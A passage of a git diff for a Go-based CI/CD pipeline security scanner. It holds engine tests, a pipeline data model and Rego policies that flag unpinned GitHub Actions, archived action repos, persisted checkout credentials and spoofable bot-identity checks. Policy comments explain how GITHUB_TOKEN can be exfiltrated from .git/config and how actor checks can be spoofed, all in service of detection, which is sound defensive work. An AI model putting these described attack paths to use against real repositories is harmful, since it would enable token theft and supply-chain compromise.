+ t.Fatalf("expected findings sorted by code ALP-001 then ZEB-001, got %q then %q",
+ findings[0].Code, findings[1].Code)
+ }
+}
+
+func TestEvaluateFindingsSortedTieBreakByJob(t *testing.T) {
+ const mod = `package tiebreak
+
+deny contains finding if {
+ input.pipeline.provider == "gitlab"
+ finding := {"code": "SAME", "job": "zzz"}
+}
+
+deny contains finding if {
+ input.pipeline.provider == "gitlab"
+ finding := {"code": "SAME", "job": "aaa"}
+}
+`
+
+ engine := New()
+ engine.LoadModule("tiebreak", mod)
+ pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitLab}
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if len(findings) != 2 {
+ t.Fatalf("expected 2 findings, got %d", len(findings))
+ }
+ if findings[0].Job != "aaa" || findings[1].Job != "zzz" {
+ t.Fatalf("expected tie-break by job: aaa then zzz, got %q then %q",
+ findings[0].Job, findings[1].Job)
+ }
+}
+
+func TestLoadFromFS(t *testing.T) {
+ fsys := fstest.MapFS{
+ "first.rego": &fstest.MapFile{Data: []byte("package first")},
+ "second.rego": &fstest.MapFile{Data: []byte("package second")},
+ "ignored.txt": &fstest.MapFile{Data: []byte("should not be loaded")},
+ }
+
+ engine := New()
+ if err := engine.LoadFromFS(fsys); err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+
+ if _, ok := engine.modules["first"]; !ok {
+ t.Error("first.rego should be loaded as module \"first\"")
+ }
+ if _, ok := engine.modules["second"]; !ok {
+ t.Error("second.rego should be loaded as module \"second\"")
+ }
+ if _, ok := engine.modules["ignored"]; ok {
+ t.Error("non-.rego files must be skipped")
+ }
+ if len(engine.modules) != 2 {
+ t.Errorf("expected exactly 2 modules, got %d", len(engine.modules))
+ }
+}
diff --git a/internal/ir/pipeline.go b/internal/ir/pipeline.go
new file mode 100644
index 0000000..92e3851
--- /dev/null
+++ b/internal/ir/pipeline.go
@@ -0,0 +1,296 @@
+// Package ir defines the provider-agnostic intermediate representation of a
+// CI/CD pipeline. Provider collectors produce an *ir.NormalizedPipeline that
+// the OPA rule engine consumes regardless of the source.
+package ir
+
+// Provider identifies the CI/CD platform that originated a pipeline.
+type Provider string
+
+// Supported providers.
+const (
+ ProviderGitLab Provider = "gitlab"
+ ProviderGitHub Provider = "github"
+)
+
+// NormalizedPipeline is the provider-agnostic view of a CI/CD pipeline.
+// Provider-specific data that does not fit the shared fields lives in Raw.
+type NormalizedPipeline struct {
+ Provider Provider `json:"provider"`
+ ProjectPath string `json:"projectPath,omitempty"`
+ DefaultBranch string `json:"defaultBranch,omitempty"`
+ Jobs []Job `json:"jobs,omitempty"`
+ Includes []Include `json:"includes,omitempty"`
+ Branches []Branch `json:"branches,omitempty"`
+ Dependabot *DependabotConfig `json:"dependabot,omitempty"`
+
+ // GlobalVariables are pipeline-level variables declared at the top
+ // of the source (e.g. `variables:` block at the root of
+ // .gitlab-ci.yml). Rules that scan for forbidden values
+ // (CI_DEBUG_TRACE, secret-name patterns, controlled overrides) read
+ // both these globals and the per-job Variables map.
+ GlobalVariables map[string]string `json:"globalVariables,omitempty"`
+
+ // RenovateConfigPath is the file path where a Renovate config was
+ // discovered (`renovate.json`, `.renovaterc`, `renovate.json5`,
+ // β¦). Empty when no Renovate config is present.
+ RenovateConfigPath string `json:"renovateConfigPath,omitempty"`
+
+ // SecurityPolicyPath is the path of the repository's SECURITY.md
+ // (root, .github/, or docs/). Empty when the file is absent.
+ SecurityPolicyPath string `json:"securityPolicyPath,omitempty"`
+
+ // Dockerfiles lists every Dockerfile the collector scanned at the
+ // repo root and under common build directories, with each FROM
+ // base-image extracted so policies can check pinning state.
+ Dockerfiles []Dockerfile `json:"dockerfiles,omitempty"`
+
+ Raw map[string]any `json:"raw,omitempty"`
+}
+
+// Dockerfile captures the result of parsing a single Dockerfile's
+// FROM directives for supply-chain auditing.
+type Dockerfile struct {
+ Path string `json:"path"`
+ Bases []DockerfileBase `json:"bases,omitempty"`
+}
+
+// DockerfileBase is one FROM line. PinnedByDigest is true when the
+// base image is referenced via `image@sha256:...` (immutable);
+// otherwise the tag (or default-tag) form lets the registry serve a
+// different layer for the same name.
+type DockerfileBase struct {
+ Image string `json:"image"`
+ Line int `json:"line"`
+ PinnedByDigest bool `json:"pinnedByDigest,omitempty"`
+}
+
+// DependabotConfig captures the bits of .github/dependabot.yml that
+// feed the dependabot-* policies. Populated by the GitHub collector
+// when the file exists; nil otherwise.
+type DependabotConfig struct {
+ Path string `json:"path"`
+ InsecureExecEcosystems []string `json:"insecureExecEcosystems,omitempty"`
+ // MissingCooldownEcosystems lists ecosystems in the config that
+ // have no `cooldown:` block. A cooldown window gives security
+ // advisory pipelines time to flag a bad release before
+ // Dependabot's PR automation picks it up.
+ MissingCooldownEcosystems []string `json:"missingCooldownEcosystems,omitempty"`
+}
+
+// Job is a single pipeline unit of work.
+type Job struct {
+ Name string `json:"name"`
+ Image *Image `json:"image,omitempty"`
+ Services []Image `json:"services,omitempty"`
+ Scripts []string `json:"scripts,omitempty"`
+ // ScriptBlocks names the source block ("before_script", "script",
+ // "after_script") for each entry of Scripts, in the same order.
+ // Lets script-scanning policies surface where the offending line
+ // lives so legacy consumers (the Rego-port issue payload) can
+ // echo the v0.2.x scriptBlock attribute. Empty when the collector
+ // did not track origins (older fixtures).
+ ScriptBlocks []string `json:"scriptBlocks,omitempty"`
+ AllowFailure bool `json:"allowFailure,omitempty"`
+ When string `json:"when,omitempty"`
+ Variables map[string]string `json:"variables,omitempty"`
+ // LocalVariables is the raw `variables:` map authored by the
+ // project itself (root .gitlab-ci.yml or workflow file), before any
+ // merge with upstream component/template definitions. Empty when
+ // the user did not declare a `variables:` block on this job β
+ // distinguishing "user wrote SAST_DISABLED here" from "upstream
+ // template ships SAST_DISABLED". Variable-override policies must
+ // read this field, never the merged Variables, to avoid punishing
+ // projects for variables their upstream catalogs already set.
+ LocalVariables map[string]string `json:"localVariables,omitempty"`
+ // Rules captures the job's `rules:` block (GitLab CI). Each entry
+ // is a {if, when, allow_failure, exists, changes, β¦} map; rules
+ // such as `- when: never` neutralise the job at runtime even when
+ // the job is otherwise correctly configured. Policies that care
+ // about effective execution (security-job weakening) read this
+ // list and reject any rule whose terminal `when` would prevent
+ // the job from running.
+ Rules []map[string]any `json:"rules,omitempty"`
+ OriginFile string `json:"originFile,omitempty"`
+ OriginLine int `json:"originLine,omitempty"`
+ OriginKind string `json:"originKind,omitempty"`
+ // Overridden is true when the job inherits from an upstream
+ // component or template but the project locally redefined some of
+ // its keys. Lets policies distinguish "user-authored override" from
+ // "vanilla upstream definition" β the rules-redefinition guard in
+ // security_jobs_weakened depends on this signal.
+ Overridden bool `json:"overridden,omitempty"`
+ // OverriddenKeys lists the specific job-level keys the project
+ // redefined when overriding an upstream definition (`rules`,
+ // `image`, `when`, β¦). Empty when the job was not overridden,
+ // which lets policies target a particular kind of override
+ // (rules redefinition, image substitution, β¦) without flagging
+ // every override globally.
+ OverriddenKeys []string `json:"overriddenKeys,omitempty"`
+
+ // Permissions are the job's effective permissions as declared in the
+ // source provider. For GitHub Actions this is the job-level block if
+ // present, otherwise the inherited workflow-level block. The value may
+ // be a string shortcut ("write-all", "read-all") or a map of scope
+ // names to access level β policies are expected to handle both.
+ Permissions any `json:"permissions,omitempty"`
+
+ // Triggers are the event names under which the enclosing workflow runs
+ // (for GitHub Actions, the `on:` section of the workflow file). The
+ // collector propagates them to every job of the workflow. GitLab jobs
+ // leave this field empty: the concept maps poorly onto GitLab's
+ // `workflow.rules` and `only/except` semantics, and the few rules that
+ // care about triggers are GitHub-specific.
+ Triggers []string `json:"triggers,omitempty"`
+
+ // Uses lists every third-party action referenced by the job's steps
+ // (for GitHub Actions, `jobs..steps[].uses` with its
+ // accompanying `with:` block). Empty for GitLab jobs, which model
+ // external code through `include:` instead (already covered by the
+ // pipeline Includes list).
+ Uses []Action `json:"uses,omitempty"`
+
+ // ReusableWorkflowUses is the `uses:` declared at the job level (not
+ // the step level). Populated only for GitHub Actions jobs that are
+ // reusable-workflow calls: `jobs..uses:
+ // owner/repo/.github/workflows/x.yml@ref`. Empty for every other
+ // job type.
+ ReusableWorkflowUses string `json:"reusableWorkflowUses,omitempty"`
+
+ // SecretsInherit is true when a reusable-workflow call forwards
+ // every caller-visible secret to the callee via `secrets: inherit`.
+ // Only meaningful when ReusableWorkflowUses is set.
+ SecretsInherit bool `json:"secretsInherit,omitempty"`
+
+ // Conditions collects every `if:` expression attached to the job
+ // (job-level + each step's). Kept as raw YAML strings so Rego
+ // policies can match them with regular expressions β no attempt
+ // at GitHub-expression-language parsing at the collector level.
+ Conditions []string `json:"conditions,omitempty"`
+
+ // WorkflowName is the value of the top-level `name:` field of the
+ // enclosing workflow. Empty when the workflow has no explicit
+ // name (GitHub falls back to the file path in the UI). Propagated
+ // to every job of the workflow by the collector.
+ WorkflowName string `json:"workflowName,omitempty"`
+
+ // WorkflowHasConcurrency is true when the enclosing workflow
+ // declares a top-level `concurrency:` block. Job-level
+ // concurrency is tracked separately via JobHasConcurrency.
+ WorkflowHasConcurrency bool `json:"workflowHasConcurrency,omitempty"`
+
+ // JobHasConcurrency is true when the job has its own
+ // `concurrency:` block, independent of the workflow-level one.
+ JobHasConcurrency bool `json:"jobHasConcurrency,omitempty"`
+
+ // Environment is the `environment:` field declared on the job
+ // (GitHub Actions deployment environment gate). Accepts both the
+ // `environment: production` shorthand and the long form β the
+ // collector keeps only the name. Empty when no environment is set.
+ Environment string `json:"environment,omitempty"`
+}
+
+// Action is a single invocation of a reusable third-party action.
+// Uses is the full ref ("owner/repo@v4" or "owner/repo@"), With
+// is the raw `with:` map (scope values may be strings, bools or
+// numbers, hence `any`).
+//
+// Metadata, when present, carries facts resolved against the
+// GitHub API (archived repo, ref kind, tag SHA). Zero-valued
+// Metadata β or a nil pointer β means the collector did not look
+// it up (no token, offline run, non-GitHub action). Policies that
+// key on API evidence should treat absence as "unknown" and stay
+// silent to avoid false positives.
+//
+// Comment holds the trailing `# comment` that workflow authors
+// commonly add behind a hash-pinned reference to document the
+// human-readable version (e.g. `@abc123β¦ # v4.1.0`). Kept as the
+// raw string after stripping leading whitespace + `#`.
+type Action struct {
+ Uses string `json:"uses"`
+ With map[string]any `json:"with,omitempty"`
+ // Line is the 1-based line number of the `uses:` directive in the
+ // source workflow file. Populated by the provider collector so
+ // action-level findings can point the reviewer at the exact step
+ // instead of the surrounding job header. Zero when unknown.
+ Line int `json:"line,omitempty"`
+ Metadata *ActionMetadata `json:"metadata,omitempty"`
+ Comment string `json:"comment,omitempty"`
+}
+
+// ActionMetadata mirrors the collector-side GitHubMetadata shape.
+// Kept in internal/ir so policies can consume it via the serialised
+// JSON input without internal/ir importing the collector package.
+type ActionMetadata struct {
+ RepoArchived bool `json:"repoArchived,omitempty"`
+ RefExists bool `json:"refExists,omitempty"`
+ RefKind string `json:"refKind,omitempty"`
+ TagSha string `json:"tagSha,omitempty"`
+ LatestTag string `json:"latestTag,omitempty"`
+ LatestReleaseSha string `json:"latestReleaseSha,omitempty"`
+ CommentVersion string `json:"commentVersion,omitempty"`
+ CommentTagSha string `json:"commentTagSha,omitempty"`
+ RefIsAmbiguous bool `json:"refIsAmbiguous,omitempty"`
+ Advisories []string `json:"advisories,omitempty"`
+}
+
+// Image references a container image (job image, service, step base).
+// CredentialsPassword carries the literal value of the image's
+// `credentials.password` field (GitHub Actions `jobs.*.container` and
+// `services.*`). It is the raw YAML string β `${{ secrets.X }}`
+// expressions come through as the template itself, so policies can
+// distinguish a secret reference from a hard-coded literal.
+type Image struct {
+ Name string `json:"name"`
+ Tag string `json:"tag,omitempty"`
+ Digest string `json:"digest,omitempty"`
+ Registry string `json:"registry,omitempty"`
+ CredentialsPassword string `json:"credentialsPassword,omitempty"`
+}
+
+// Include models an external pipeline fragment pulled into the current one.
+// Path is a normalized form of Source suitable for comparison against a
+// user-declared required component/template list (version suffix and
+// instance URL prefix stripped). AltPath optionally carries a second
+// candidate path β some collectors (Plumber-augmented templates)
+// know a template under two equivalent names and both should match.
+// OverriddenJobs enumerates the jobs inherited from this include whose
+// behaviour was overridden locally with one of the CI/CD keys that
+// meaningfully change semantics (script, image, rules, β¦).
+type Include struct {
+ Kind string `json:"kind"`
+ Source string `json:"source"`
+ Ref string `json:"ref,omitempty"`
+ Current string `json:"current,omitempty"`
+ Path string `json:"path,omitempty"`
+ AltPath string `json:"altPath,omitempty"`
+ Nested bool `json:"nested,omitempty"`
+ ComponentName string `json:"componentName,omitempty"`
+ // OriginHash is a stable identifier for the origin of this
+ // include, used by external tooling to deduplicate the same
+ // upstream source across pipelines.
+ OriginHash uint64 `json:"originHash,omitempty"`
+ OverriddenJobs []OverriddenJob `json:"overriddenJobs,omitempty"`
+}
+
+// OverriddenJob captures a single job whose inherited definition was
+// locally overridden. Keys is the list of CI/CD fields (script, image,
+// rules, β¦) whose values were redefined in the pipeline configuration.
+type OverriddenJob struct {
+ Name string `json:"name"`
+ Keys []string `json:"keys,omitempty"`
+}
+
+// Branch is a branch of the source repository as seen by the collector.
+// Fields beyond Name/Protected are populated from the provider's branch
+// protection API (GitLab /api/v4/projects/:id/protected_branches, the
+// GitHub equivalent, β¦). They stay zero-valued when the collector did
+// not fetch protection settings.
+type Branch struct {
+ Name string `json:"name"`
+ Protected bool `json:"protected"`
+ ProtectionPattern string `json:"protectionPattern,omitempty"`
+ AllowForcePush bool `json:"allowForcePush,omitempty"`
+ CodeOwnerApprovalRequired bool `json:"codeOwnerApprovalRequired,omitempty"`
+ MinPushAccessLevel int `json:"minPushAccessLevel,omitempty"`
+ MinMergeAccessLevel int `json:"minMergeAccessLevel,omitempty"`
+}
diff --git a/pbom/cyclonedx.go b/pbom/cyclonedx.go
index 5e245bd..8098bb8 100644
--- a/pbom/cyclonedx.go
+++ b/pbom/cyclonedx.go
@@ -13,11 +13,13 @@ const CycloneDXSpecVersion = "1.5"
// CycloneDX represents a CycloneDX SBOM
// Spec: https://cyclonedx.org/docs/1.5/json/
+// Struct field order matches a natural read path: BOM header, identifiers,
+// metadata (project/tool), dependency components last.
type CycloneDX struct {
BOMFormat string `json:"bomFormat"`
SpecVersion string `json:"specVersion"`
- SerialNumber string `json:"serialNumber"`
Version int `json:"version"`
+ SerialNumber string `json:"serialNumber"`
Metadata CycloneDXMetadata `json:"metadata"`
Components []CycloneDXComponent `json:"components"`
}
diff --git a/pbom/generate.go b/pbom/generate.go
index da6022f..b76de44 100644
--- a/pbom/generate.go
+++ b/pbom/generate.go
@@ -1,6 +1,7 @@
package pbom
import (
+ "sort"
"time"
"github.com/getplumber/plumber/collector"
@@ -24,12 +25,12 @@ type IncludeOverrideData struct {
// Generator creates PBOMs from pipeline analysis data
type Generator struct {
- projectPath string
- projectID int
- gitlabURL string
- branch string
- complianceData *ImageComplianceData
- includeOverrides *IncludeOverrideData
+ projectPath string
+ projectID int
+ gitlabURL string
+ branch string
+ complianceData *ImageComplianceData
+ includeOverrides *IncludeOverrideData
}
// NewGenerator creates a new PBOM generator
@@ -102,16 +103,23 @@ func (g *Generator) processImages(imageData *collector.GitlabPipelineImageData)
}
}
- // Convert to PBOM format
- images := make([]ContainerImage, 0, len(imageJobMap))
- for link, jobs := range imageJobMap {
+ // Convert to PBOM format in stable order (sorted image link β map iteration is not deterministic).
+ links := make([]string, 0, len(imageJobMap))
+ for link := range imageJobMap {
+ links = append(links, link)
+ }
+ sort.Strings(links)
+
+ images := make([]ContainerImage, 0, len(links))
+ for _, link := range links {
+ jobs := imageJobMap[link]
info := imageInfoMap[link]
img := ContainerImage{
Image: link,
Registry: info.Registry,
Name: info.Name,
Tag: info.Tag,
- Jobs: uniqueStrings(jobs),
+ Jobs: uniqueSortedStrings(jobs),
}
// Enrich with compliance data if available
@@ -221,17 +229,16 @@ func (g *Generator) calculateSummary(pbom *PBOM) Summary {
return summary
}
-// uniqueStrings returns a slice with duplicate strings removed
-func uniqueStrings(input []string) []string {
+// uniqueSortedStrings removes duplicates and sorts for stable PBOM JSON.
+func uniqueSortedStrings(input []string) []string {
seen := make(map[string]struct{})
- result := make([]string, 0, len(input))
-
for _, s := range input {
- if _, exists := seen[s]; !exists {
- seen[s] = struct{}{}
- result = append(result, s)
- }
+ seen[s] = struct{}{}
}
-
- return result
+ out := make([]string, 0, len(seen))
+ for s := range seen {
+ out = append(out, s)
+ }
+ sort.Strings(out)
+ return out
}
diff --git a/pbom/types.go b/pbom/types.go
index df26263..f095ae6 100644
--- a/pbom/types.go
+++ b/pbom/types.go
@@ -17,23 +17,20 @@ const Version = "1.0.0"
// PBOM represents a Pipeline Bill of Materials - an inventory of all
// dependencies used in a CI/CD pipeline.
+// JSON field order follows encode/json struct order: version stamp, project
+// context, aggregate summary, score, then inventories (read top-to-bottom).
type PBOM struct {
- // Metadata
PBOMVersion string `json:"pbomVersion"`
GeneratedAt time.Time `json:"generatedAt"`
- // Project information
Project ProjectInfo `json:"project"`
- // Pipeline dependencies
- ContainerImages []ContainerImage `json:"containerImages"`
- Includes []Include `json:"includes"`
-
- // Summary statistics
Summary Summary `json:"summary"`
- // PlumberScore is optional letter Score (AβE) and numeric Points (0β100); set when analyze uses --score and/or --score-point.
PlumberScore *PlumberScoreSummary `json:"plumberScore,omitempty"`
+
+ ContainerImages []ContainerImage `json:"containerImages"`
+ Includes []Include `json:"includes"`
}
// PlumberScoreSummary mirrors control.PlumberScoreResult for JSON consumers (PBOM / SBOM).
@@ -77,8 +74,8 @@ type ContainerImage struct {
Jobs []string `json:"jobs"`
// Compliance status (from analysis, if available)
- Authorized *bool `json:"authorized,omitempty"`
- ForbiddenTag *bool `json:"forbiddenTag,omitempty"`
+ Authorized *bool `json:"authorized,omitempty"`
+ ForbiddenTag *bool `json:"forbiddenTag,omitempty"`
}
// Include represents an include/component/template used in the pipeline
@@ -105,7 +102,7 @@ type Include struct {
Nested bool `json:"nested,omitempty"`
// Override information (populated from control results)
- Overridden bool `json:"overridden,omitempty"`
+ Overridden bool `json:"overridden,omitempty"`
OverriddenJobs []utils.OverriddenJobDetail `json:"overriddenJobs,omitempty"`
}
diff --git a/policies/action_archived_repo.rego b/policies/action_archived_repo.rego
new file mode 100644
index 0000000..1373f49
--- /dev/null
+++ b/policies/action_archived_repo.rego
@@ -0,0 +1,26 @@
+# action-archived-repo β flag workflow steps that reference an action
+# whose GitHub repository is archived. Archived repos no longer
+# receive maintenance; any existing vulnerability stays open and the
+# project has no path for future security patches.
+#
+# Driven by the collector's API-resolved metadata. When the metadata
+# is missing (gh not authenticated, offline run, non-GitHub action)
+# the policy stays silent: we never raise a finding on the absence of
+# positive evidence.
+package action_archived_repo
+
+import rego.v1
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ action.metadata.repoArchived == true
+ finding := {
+ "code": "ISSUE-108",
+ "severity": "high",
+ "message": sprintf("job %q references %q whose upstream repository is archived β no security patches are coming", [job.name, action.uses]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
diff --git a/policies/action_unpinned.rego b/policies/action_unpinned.rego
new file mode 100644
index 0000000..85123ae
--- /dev/null
+++ b/policies/action_unpinned.rego
@@ -0,0 +1,79 @@
+# action-unpinned β flag GitHub Actions workflow steps whose `uses:`
+# reference is not pinned by a 40-character commit SHA. Tag and branch
+# refs ("v4", "main") are mutable: an attacker who compromises the
+# action's repository can retag them to point at arbitrary code, which
+# then executes inside the caller workflow with its secrets. This is
+# the vector behind the March 2025 tj-actions/changed-files compromise
+# (CVE-2025-30066).
+#
+# Config (optional):
+# input.config.actionsMustBePinnedByCommitSha.trustedOwners = ["actions", "github"]
+# Owners whose actions are exempt from the pin requirement. Only
+# owners inside the repository's own trust boundary should be
+# listed β "actions" and "github" cover the first-party GitHub-
+# owned actions that any workflow already executes implicitly.
+# input.config.actionsMustBePinnedByCommitSha.allowLocal = true
+# When true, local actions (`uses: ./.github/actions/foo`) are
+# exempt. They live in the same repository, so there is no
+# additional trust boundary to worry about.
+package action_unpinned
+
+import rego.v1
+
+deny contains finding if {
+ # Only run when the user opted in. The default is off: pin-by-SHA is
+ # a supply-chain best practice, but also a non-trivial operational
+ # change β noisy output before the user has chosen the policy would
+ # train them to ignore real findings.
+ input.config.actionsMustBePinnedByCommitSha
+ some i, j
+ job := input.pipeline.jobs[i]
+ use := job.uses[j]
+ ref := _ref_of(use.uses)
+ not _is_sha(ref)
+ not _is_local(use.uses)
+ not _is_trusted_owner(use.uses)
+ finding := {
+ "code": "ISSUE-104",
+ "severity": "high",
+ "message": sprintf("job %q references action %q with a mutable ref β pin by commit SHA instead", [job.name, use.uses]),
+ "job": job.name,
+ "line": object.get(use, "line", 0),
+ }
+}
+
+# _ref_of returns the substring after "@" in "owner/repo@ref".
+# Returns "" when the string has no "@" β which we treat as
+# unpinned (a bare "owner/repo" defaults to the repo's default
+# branch and is also a supply-chain risk).
+_ref_of(uses) := ref if {
+ idx := indexof(uses, "@")
+ idx >= 0
+ ref := substring(uses, idx + 1, -1)
+} else := ""
+
+# _is_sha is true when ref is exactly 40 lowercase hex characters.
+_is_sha(ref) if {
+ regex.match(`^[0-9a-f]{40}$`, ref)
+}
+
+# Local actions ("./.github/actions/foo", "./foo") live in the
+# repository itself β no external trust boundary.
+_is_local(uses) if {
+ startswith(uses, "./")
+}
+
+_is_local(uses) if {
+ startswith(uses, "/")
+}
+
+# Docker-image action refs ("docker://gcr.io/β¦") are covered by the
+# container-image policies, not this one.
+_is_local(uses) if {
+ startswith(uses, "docker://")
+}
+
+_is_trusted_owner(uses) if {
+ some trusted in input.config.actionsMustBePinnedByCommitSha.trustedOwners
+ startswith(uses, sprintf("%s/", [trusted]))
+}
diff --git a/policies/anonymous_definition.rego b/policies/anonymous_definition.rego
new file mode 100644
index 0000000..ee6404d
--- /dev/null
+++ b/policies/anonymous_definition.rego
@@ -0,0 +1,35 @@
+# anonymous-definition β flag GitHub Actions workflow files that omit
+# the top-level `name:` field. Without an explicit name, GitHub uses
+# the file path as the display identifier in the Actions UI, PR
+# checks, the required-status-check settings on branch protections,
+# and the audit log. Renaming the file later silently breaks any
+# required-check binding that references the old path, giving the
+# appearance of a passing gate when nothing is actually running.
+#
+# The policy emits once per workflow file (not once per job) by
+# deduplicating on originFile before building the findings set.
+package anonymous_definition
+
+import rego.v1
+
+deny contains finding if {
+ input.pipeline.provider == "github"
+ some file in _anonymous_workflow_files
+ finding := {
+ "code": "ISSUE-601",
+ "severity": "low",
+ "message": sprintf("workflow file %q has no top-level `name:` β GitHub falls back to the file path", [file]),
+ "file": file,
+ }
+}
+
+_anonymous_workflow_files contains file if {
+ # json:",omitempty" drops the field from the serialised IR when
+ # the workflow has no name, so we test for absence with `not`
+ # rather than `== ""`.
+ some i
+ job := input.pipeline.jobs[i]
+ not job.workflowName
+ job.originFile != ""
+ file := job.originFile
+}
diff --git a/policies/artipacked.rego b/policies/artipacked.rego
new file mode 100644
index 0000000..09a8edf
--- /dev/null
+++ b/policies/artipacked.rego
@@ -0,0 +1,41 @@
+# artipacked β detect jobs that check out the repository with
+# `actions/checkout` without disabling credential persistence. By
+# default, actions/checkout writes the GITHUB_TOKEN into the cloned
+# repository's .git/config, where it survives for the lifetime of the
+# job. Any later step that uploads `.git` as part of an artifact, or
+# that executes fork-controlled code, can exfiltrate the token. The
+# documented mitigation is a one-liner: `with: persist-credentials:
+# false`.
+#
+# This check pairs with dangerous-triggers (ISSUE-414) and
+# template-injection (ISSUE-206): the persisted credential is
+# precisely what an attacker harvests once they escalate through the
+# trigger / injection path.
+package artipacked
+
+import rego.v1
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ startswith(action.uses, "actions/checkout@")
+ not _credentials_disabled(action)
+ finding := {
+ "code": "ISSUE-307",
+ "severity": "high",
+ "message": sprintf("job %q runs %q without `persist-credentials: false` β GITHUB_TOKEN lingers in .git/config and is exfiltrable by later steps", [job.name, action.uses]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+# YAML represents `persist-credentials: false` as the boolean false.
+# Accept both forms defensively in case a workflow uses quotes.
+_credentials_disabled(action) if {
+ action.with["persist-credentials"] == false
+}
+
+_credentials_disabled(action) if {
+ action.with["persist-credentials"] == "false"
+}
diff --git a/policies/bot_conditions.rego b/policies/bot_conditions.rego
new file mode 100644
index 0000000..723536e
--- /dev/null
+++ b/policies/bot_conditions.rego
@@ -0,0 +1,51 @@
+# bot-conditions β flag workflows that gate behaviour on a spoofable
+# actor or bot identity check (`github.actor`,
+# `github.triggering_actor`, `github.event.sender.login`, ...). Those
+# fields reflect whoever opened / synchronised the PR, not a verified
+# bot identity. A contributor who registers a GitHub account named
+# `dependabot[bot]` (or uses a fork trick on the right trigger) can
+# satisfy `if: github.actor == 'dependabot[bot]'` and ride through
+# whatever elevated path the workflow gates on it.
+#
+# The policy scans every `if:` expression attached to the job (job-
+# level + each step's) for comparisons against known bot logins or
+# for direct use of the actor/sender fields in an equality check.
+package bot_conditions
+
+import rego.v1
+
+# spoofable_login_patterns match the most common bot accounts projects
+# gate on. Adding a trusted internal user here does NOT make the check
+# safe β the policy fires on the pattern regardless of the specific
+# value, the list is only used for severity framing / messaging.
+spoofable_fields := [
+ `github\.actor`,
+ `github\.triggering_actor`,
+ `github\.event\.sender\.login`,
+ `github\.event\.pusher\.name`,
+ `github\.event\.pull_request\.user\.login`,
+ `github\.event\.head_commit\.author\.name`,
+]
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ cond := job.conditions[j]
+ _has_spoofable_actor_check(cond)
+ finding := {
+ "code": "ISSUE-210",
+ "severity": "high",
+ "message": sprintf("job %q gates on a spoofable actor/bot check β %q cannot be trusted for privileged paths", [job.name, cond]),
+ "job": job.name,
+ }
+}
+
+_has_spoofable_actor_check(cond) if {
+ some field in spoofable_fields
+ regex.match(sprintf(`%s\s*==`, [field]), cond)
+}
+
+_has_spoofable_actor_check(cond) if {
+ some field in spoofable_fields
+ regex.match(sprintf(`==\s*[^!=]*%s`, [field]), cond)
+}
diff --git a/policies/branch_non_compliant.rego b/policies/branch_non_compliant.rego
new file mode 100644
index 0000000..8b560ba
--- /dev/null
+++ b/policies/branch_non_compliant.rego
@@ -0,0 +1,105 @@
+# branch-non-compliant β flag protected branches whose rule settings
+# do not meet the minimum bar set in .plumber.yaml.
+#
+# Only branches that fall under the same policy scope as ISSUE-501
+# (namePatterns match or defaultMustBeProtected + default branch) are
+# evaluated. Other protected branches are ignored so narrowing
+# namePatterns does not leave stray ISSUE-505 on out-of-scope branches.
+#
+# Mirrors controlGitlabProtectionBranchProtectionNotCompliant.go:
+#
+# - allowForcePush must be false (when configured)
+# - codeOwnerApprovalRequired must be true (when configured)
+# - minPushAccessLevel / minMergeAccessLevel: GitLab access levels are
+# numeric (0 = No one, 30 = Developer, 40 = Maintainer). 0 is the
+# STRICTEST setting β fewer roles can perform the action. The branch
+# is flagged when:
+# * GitLab reported a non-zero level for the branch, AND
+# * either policy is 0 (must be "No one"), or branch level < policy.
+package branch_non_compliant
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ branch := input.pipeline.branches[i]
+ branch.protected == true
+ _branch_in_protection_scope(branch.name)
+ reasons := [r | r := _non_compliant_reasons[branch.name][_]]
+ count(reasons) > 0
+ finding := {
+ "code": "ISSUE-505",
+ "severity": "high",
+ "message": sprintf("Branch '%s' has non-compliant protection settings", [branch.name]),
+ "job": branch.name,
+ "type": "non_compliant",
+ "branchName": branch.name,
+ "reasons": reasons,
+ "allowForcePush": object.get(branch, "allowForcePush", false),
+ "allowForcePushDisplay": object.get(branch, "allowForcePush", false),
+ "minMergeAccessLevel": object.get(branch, "minMergeAccessLevel", 0),
+ "authorizedMinMergeAccessLevel": object.get(input.config.branchMustBeProtected, "minMergeAccessLevel", 0),
+ "minPushAccessLevel": object.get(branch, "minPushAccessLevel", 0),
+ "authorizedMinPushAccessLevel": object.get(input.config.branchMustBeProtected, "minPushAccessLevel", 0),
+ }
+}
+
+# Same scope as package branch_unprotected: branches the user marked as
+# subject to branch protection policy (not every protected branch in GitLab).
+_branch_in_protection_scope(name) if {
+ cfg := object.get(input.config, "branchMustBeProtected", {})
+ object.get(cfg, "defaultMustBeProtected", false) == true
+ name == input.pipeline.defaultBranch
+}
+
+_branch_in_protection_scope(name) if {
+ cfg := object.get(input.config, "branchMustBeProtected", {})
+ patterns := object.get(cfg, "namePatterns", [])
+ some pattern in patterns
+ glob.match(pattern, null, name)
+}
+
+# Set of human-readable detail lines (one ISSUE-505 groups them under a
+# single headline in the CLI).
+_non_compliant_reasons[branch.name] contains "Force push is allowed (should be disabled)" if {
+ branch := input.pipeline.branches[_]
+ input.config.branchMustBeProtected.allowForcePush == false
+ branch.allowForcePush == true
+}
+
+_non_compliant_reasons[branch.name] contains "Code owner approval is not required" if {
+ branch := input.pipeline.branches[_]
+ input.config.branchMustBeProtected.codeOwnerApprovalRequired == true
+ # IR JSON omits false booleans (omitempty); use object.get so missing reads as false.
+ object.get(branch, "codeOwnerApprovalRequired", false) == false
+}
+
+# Merge access level: legacy guard β only check when GitLab reported a level
+# (cur != 0). Trigger if policy is 0 (must be "No one") or branch < policy.
+_non_compliant_reasons[branch.name] contains reason if {
+ branch := input.pipeline.branches[_]
+ cur := object.get(branch, "minMergeAccessLevel", 0)
+ cur != 0
+ min := object.get(input.config.branchMustBeProtected, "minMergeAccessLevel", 0)
+ _access_level_violates(min, cur)
+ reason := sprintf("Merge access level is too low (%d, minimum: %d)", [cur, min])
+}
+
+# Push access level: same shape, separate reason so one branch can produce both.
